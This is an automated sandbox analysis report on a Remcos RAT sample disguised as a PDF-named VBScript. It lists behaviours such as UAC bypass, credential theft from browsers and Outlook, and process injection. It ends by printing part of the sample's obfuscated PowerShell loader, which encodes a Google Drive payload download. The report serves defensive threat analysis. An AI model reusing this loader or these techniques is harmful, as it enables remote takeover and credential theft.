Malware Analysis Report

2024-12-01 03:06

Sample ID 241111-h4dhssvgnm
Target 11112024_0717_SIGN_23930581750_pdf.vbs.zip
SHA256 36a7e6bbc96ddaab87a05c6e77c75962ae930e631458abba7b6c03e4683a311d
Tags
execution remcos remotehost collection credential_access discovery evasion rat stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

36a7e6bbc96ddaab87a05c6e77c75962ae930e631458abba7b6c03e4683a311d

Threat Level: Known bad

The file 11112024_0717_SIGN_23930581750_pdf.vbs.zip was found to be: Known bad.

Malicious Activity Summary

execution remcos remotehost collection credential_access discovery evasion rat stealer trojan

UAC bypass

Remcos

Remcos family

Detected Nirsoft tools

NirSoft WebBrowserPassView

NirSoft MailPassView

Uses browser remote debugging

Blocklisted process makes network request

Checks computer location settings

Accesses Microsoft Outlook accounts

Legitimate hosting services abused for malware hosting/C2

Command and Scripting Interpreter: PowerShell

Suspicious use of SetThreadContext

Drops file in System32 directory

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of NtCreateThreadExHideFromDebugger

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of FindShellTrayWindow

Enumerates system info in registry

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: MapViewOfSection

Suspicious use of WriteProcessMemory

Modifies registry class

Suspicious use of AdjustPrivilegeToken

Modifies registry key

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-11 07:17

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-11 07:17

Reported

2024-11-11 07:22

Platform

win7-20241023-en

Max time kernel

121s

Max time network

121s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SIGN_23930581750·pdf.vbs"

Signatures

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WScript.exe | N/A

Command and Scripting Interpreter: PowerShell

execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SIGN_23930581750·pdf.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe


Network

Files

C:\Users\Admin\AppData\Local\Temp\CabBBC3.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b


Analysis: behavioral2

Detonation Overview

Submitted

2024-11-11 07:17

Reported

2024-11-11 07:22

Platform

win10v2004-20241007-en

Max time kernel

169s

Max time network

188s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SIGN_23930581750·pdf.vbs"

Signatures

Remcos

rat remcos

Remcos family

remcos

UAC bypass

evasion trojan
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A

Detected Nirsoft tools

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

NirSoft MailPassView

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

NirSoft WebBrowserPassView

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A

Accesses Microsoft Outlook accounts

collection
Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Windows\SysWOW64\msiexec.exe | N/A

Command and Scripting Interpreter: PowerShell

execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Legitimate hosting services abused for malware hosting/C2

Description | Indicator | Process | Target
N/A | drive.google.com | N/A | N/A
N/A | drive.google.com | N/A | N/A
N/A | drive.google.com | N/A | N/A

Drops file in System32 directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\SysWOW64\msiexec.exe | C:\Windows\SysWOW64\msiexec.exe | N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 432 set thread context of 3328 | N/A | C:\Windows\SysWOW64\msiexec.exe | C:\Windows\SysWOW64\msiexec.exe
PID 432 set thread context of 4528 | N/A | C:\Windows\SysWOW64\msiexec.exe | C:\Windows\SysWOW64\msiexec.exe
PID 432 set thread context of 1520 | N/A | C:\Windows\SysWOW64\msiexec.exe | C:\Windows\SysWOW64\msiexec.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A

Enumerates system info in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A

Modifies registry class

Description | Indicator | Process | Target
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings | C:\Windows\SysWOW64\msiexec.exe | N/A

Modifies registry key

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4452 wrote to memory of 4004 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4452 wrote to memory of 4004 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1708 wrote to memory of 432 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\msiexec.exe
PID 1708 wrote to memory of 432 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\msiexec.exe
PID 1708 wrote to memory of 432 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\msiexec.exe
PID 1708 wrote to memory of 432 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\msiexec.exe
PID 432 wrote to memory of 4452 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\cmd.exe
PID 432 wrote to memory of 4452 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\cmd.exe
PID 432 wrote to memory of 4452 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\cmd.exe
PID 4452 wrote to memory of 2304 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4452 wrote to memory of 2304 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4452 wrote to memory of 2304 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 432 wrote to memory of 2728 N/A C:\Windows\SysWOW64\msiexec.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 432 wrote to memory of 2728 N/A C:\Windows\SysWOW64\msiexec.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2728 wrote to memory of 344 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2728 wrote to memory of 344 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 432 wrote to memory of 4072 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 432 wrote to memory of 4072 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 432 wrote to memory of 4072 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 432 wrote to memory of 2024 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 432 wrote to memory of 2024 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 432 wrote to memory of 2024 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 432 wrote to memory of 3328 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 432 wrote to memory of 3328 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 432 wrote to memory of 3328 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 432 wrote to memory of 3328 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 432 wrote to memory of 4528 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 432 wrote to memory of 4528 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 432 wrote to memory of 4528 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 432 wrote to memory of 4528 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 432 wrote to memory of 1520 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 432 wrote to memory of 1520 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 432 wrote to memory of 1520 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 432 wrote to memory of 1520 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2728 wrote to memory of 2892 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2728 wrote to memory of 2892 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2728 wrote to memory of 2892 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2728 wrote to memory of 2892 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2728 wrote to memory of 2892 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2728 wrote to memory of 2892 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2728 wrote to memory of 2892 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2728 wrote to memory of 2892 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2728 wrote to memory of 2892 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2728 wrote to memory of 2892 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2728 wrote to memory of 2892 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2728 wrote to memory of 2892 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2728 wrote to memory of 2892 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2728 wrote to memory of 2892 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2728 wrote to memory of 2892 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2728 wrote to memory of 2892 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2728 wrote to memory of 2892 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2728 wrote to memory of 2892 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2728 wrote to memory of 2892 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2728 wrote to memory of 2892 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2728 wrote to memory of 2892 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2728 wrote to memory of 2892 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2728 wrote to memory of 2892 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2728 wrote to memory of 2892 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2728 wrote to memory of 2892 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2728 wrote to memory of 2892 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2728 wrote to memory of 2892 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2728 wrote to memory of 2892 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2728 wrote to memory of 2892 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2728 wrote to memory of 2892 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SIGN_23930581750·pdf.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe


C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Haplophase Brandmnds Bagatellishcr Taagers #><#Medaljetagers Mizrah raptusser Wapiti Interpellerede Selvjustitsens #>$truckings='Supinity';function Galliumoxidernes($Bortrive){If ($host.DebuggerEnabled) {$Ringkbingerens++;$Rollefag=$Bortrive.'Length' - $Ringkbingerens} for ( $Overskrider123=4;$Overskrider123 -lt $Rollefag;$Overskrider123+=5){$Entitledness86=$Overskrider123;$Imponed+=$Bortrive[$Overskrider123]}$Imponed}function Midtpunktsgendes($Shippingmnd0){ .($Matzas) ($Shippingmnd0)}$Laborhood=Galliumoxidernes ' Bi NRestEPa dTCont.Bon wHomeES umb.arccLiteLMakrI PteES pen acitspi ';$Tait=Galliumoxidernes 'AfblMAjleoEksazF lki SkalD.gtl etha Sta/Over ';$ectoenzym=Galliumoxidernes 'S heTIodol rinsAura1Cata2S.gf ';$Stens=' Ce [Taa.N ieE skit Av..Ano SbriseHo orStjkVNonii OseC .enEA enPEle,OStuli CinnDukkTbranMDrafAEpicnBlikA Demg ProEBan,r udv] Sur:nd a:NewssOphiE.layC R muMed r ReaI In T Udsy SetPToxor ilOCal T fruOSideC.ehaOOverlEl v=Pare$WorlEPas CRabbtEnvoOheeleOplanCutwzLeukyPostM Jen ';$Tait+=Galliumoxidernes 'Gr,s5Bomb.tn,e0 Pit rem (g deWAk ii alin Pr d To oInmew A tsPa a irreNUnidTJern C,em1Eury0Salv.Baar0Dist; gra GennWFueliNi snReor6Anti4 ma ;Coun Ku.sxSn,k6Ammo4Mout;S ri ri erKontvSv n: Dep1Bdel3th r1 Uri.,lev0Co i)Ekso N,nmGT eaeS udc boxkFedtoD,te/ L e2Aero0Sejr1Bill0 C,n0Coag1 Hed0Acco1Iodi GlaFLyesi Sver GroeWeatf ProoSkrixCamo/D,ms1 Bul3Ann 1Rib .Skol0,ett ';$hundyrene=Galliumoxidernes 'ForkUtapss .tueSittR yal-DafnaEnerGPl.mEc abnP.toTEner ';$Amorists=Galliumoxidernes 'L.neh SnitplantD cipElvesMo c: Hje/Re u/Di edUnc rStruiFortv St,eRamp.ToadgForuoAutoo UdggSor lAntleRe e.ButccS igo StemRens/ ,pruPr,scSemi? 
uleUndexMe epA reo IndrObsttAn,i=SupedDeleo Wa w igensprilSvi oBrneaNethd ndf&MahoiCowrdF.tt= Par1 lliH illUIn.ioGelaqfdev1ProcEBaadWAv nh afltBlitpSy tFSubbMMbletLagoQ Ju 4 U,eSLifl4 G lvShawWTornCO hn1 KonFTrfly ydGGelis vigkInva_.lkaLStumFA ti2 .ee5.rgajIn s ';$Motorcykelen=Galliumoxidernes 'Anth>Libr ';$Matzas=Galliumoxidernes 'PermISygee orxLikv ';$Vireo='Grevekrone';$Princippets67='\Khets.Ser';Midtpunktsgendes (Galliumoxidernes 'Form$OverGS bclAurio.ikpBKiloAdagfLUno :SammRShipAAvelG eu,g Bire MulnF,te=Benz$PublE EksnAf aV Han:BesiATurnPSynkp DiaDOv,raBesktFor.aMund+Elwi$ MajPForeRf reiSawyNHellCHon Iove PSomnPKorrE ilftHighSBio.6Appe7Unin ');Midtpunktsgendes (Galliumoxidernes 'Over$Paulg nrelbarboTvanb ja,ABackL M j:,pertRefrYHallVBorgS.remTPodajLobbA nfAappoL ynkECountda.k=Hal,$S.tuASta.M MaaoFl er oseIHemosCancT .ncsOver.RekosDownpG.ldLShetICateT Pro( Res$ad im Di,o EttT andOPhlerLedicPe syRygskS ksemicrLUnprEBettnC ro)atom ');Midtpunktsgendes (Galliumoxidernes $Stens);$Amorists=$Tyvstjaalet[0];$Antorbital69=(Galliumoxidernes 'R ef$ SvrgRooflbestoOmniBSpurA aulForb:ProvBSpiloKineLRen s MurhInitE AhavK mpiDespKtohni ,hoaCh fn Clo=disaNGraseFolkw esi-EnigoTrkkBMutaJMil e ShacTakttrakk Quins AnmyUnshsDuckTM,lle IncmLige.Etho$ fbaLJe rAEcbaBPaleOToter BlohThroo .onO ,ohDMest ');Midtpunktsgendes ($Antorbital69);Midtpunktsgendes (Galliumoxidernes 'Irid$StalBreboo ierlSelvsByplhDelee AfvvRestiMic,k PoliTanda A enT gl.VideHMalkeSanda BaddMo eeUtoprHa,ms ap[Naah$SilvhInteuTermnV jrd iasy Cror rbe La n DeleSuc,]Totu=E.ma$GletT Su aFa ti .hetBygh ');$sportsbegivenheden=Galliumoxidernes ' ni.$ FliBGulpoDi ilV tsscop hTrveeKomiv AfhiInflkHarmiRefra egn.ove.Dis DBundoDebawDecenStyllFireo InfaI,mjdKajaFSup.iFin l abeAnti(Appl$udsaAPhi.mCalvoDisirUnapiScarsTilbt OvesFung,Brun$KamiDThyre,eettCosmaStyrcK,nkhAlmieCondmForreAmobnove tAn beb,smr LocnUnsue Dir)Ab.a ';$Detachementerne=$Raggen;Midtpunktsgendes (Galliumoxidernes 'Chee$ rosg Dokl.karoJettBXy oaGipslElef:M 
